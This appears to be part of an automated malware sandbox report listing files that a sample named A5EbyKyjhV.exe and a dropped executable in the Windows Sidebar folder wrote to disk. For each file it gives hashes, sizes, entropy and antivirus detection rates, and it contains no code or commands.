                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 29%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):40448
                                                Entropy (8bit):5.7028690200758465
                                                Encrypted:false
                                                SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 12%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):41472
                                                Entropy (8bit):5.6808219961645605
                                                Encrypted:false
                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):64000
                                                Entropy (8bit):5.857602289000348
                                                Encrypted:false
                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):5.618776214605176
                                                Encrypted:false
                                                SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                MD5:9B25959D6CD6097C0EF36D2496876249
                                                SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 4%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):40448
                                                Entropy (8bit):5.7028690200758465
                                                Encrypted:false
                                                SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 12%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):41472
                                                Entropy (8bit):5.6808219961645605
                                                Encrypted:false
                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):294912
                                                Entropy (8bit):6.010605469502259
                                                Encrypted:false
                                                SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                MD5:00574FB20124EAFD40DC945EC86CA59C
                                                SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):85504
                                                Entropy (8bit):5.8769270258874755
                                                Encrypted:false
                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 71%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):85504
                                                Entropy (8bit):5.8769270258874755
                                                Encrypted:false
                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 71%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):33792
                                                Entropy (8bit):5.541771649974822
                                                Encrypted:false
                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 38%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):33792
                                                Entropy (8bit):5.541771649974822
                                                Encrypted:false
                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 38%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):38400
                                                Entropy (8bit):5.699005826018714
                                                Encrypted:false
                                                SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                MD5:87765D141228784AE91334BAE25AD743
                                                SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):33280
                                                Entropy (8bit):5.634433516692816
                                                Encrypted:false
                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):5.618776214605176
                                                Encrypted:false
                                                SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                MD5:9B25959D6CD6097C0EF36D2496876249
                                                SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 4%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):32256
                                                Entropy (8bit):5.631194486392901
                                                Encrypted:false
                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):64000
                                                Entropy (8bit):5.857602289000348
                                                Encrypted:false
                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):32256
                                                Entropy (8bit):5.631194486392901
                                                Encrypted:false
                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34816
                                                Entropy (8bit):5.636032516496583
                                                Encrypted:false
                                                SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                MD5:996BD447A16F0A20F238A611484AFE86
                                                SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):342528
                                                Entropy (8bit):6.170134230759619
                                                Encrypted:false
                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):36352
                                                Entropy (8bit):5.668291349855899
                                                Encrypted:false
                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):24576
                                                Entropy (8bit):5.535426842040921
                                                Encrypted:false
                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34816
                                                Entropy (8bit):5.636032516496583
                                                Encrypted:false
                                                SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                MD5:996BD447A16F0A20F238A611484AFE86
                                                SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):36352
                                                Entropy (8bit):5.668291349855899
                                                Encrypted:false
                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):69632
                                                Entropy (8bit):5.932541123129161
                                                Encrypted:false
                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):126976
                                                Entropy (8bit):6.057993947082715
                                                Encrypted:false
                                                SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                MD5:16B480082780CC1D8C23FB05468F64E7
                                                SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):342528
                                                Entropy (8bit):6.170134230759619
                                                Encrypted:false
                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):38912
                                                Entropy (8bit):5.679286635687991
                                                Encrypted:false
                                                SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                MD5:9E910782CA3E88B3F87826609A21A54E
                                                SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):39936
                                                Entropy (8bit):5.660491370279985
                                                Encrypted:false
                                                SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                MD5:240E98D38E0B679F055470167D247022
                                                SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):46592
                                                Entropy (8bit):5.870612048031897
                                                Encrypted:false
                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):294912
                                                Entropy (8bit):6.010605469502259
                                                Encrypted:false
                                                SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                MD5:00574FB20124EAFD40DC945EC86CA59C
                                                SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
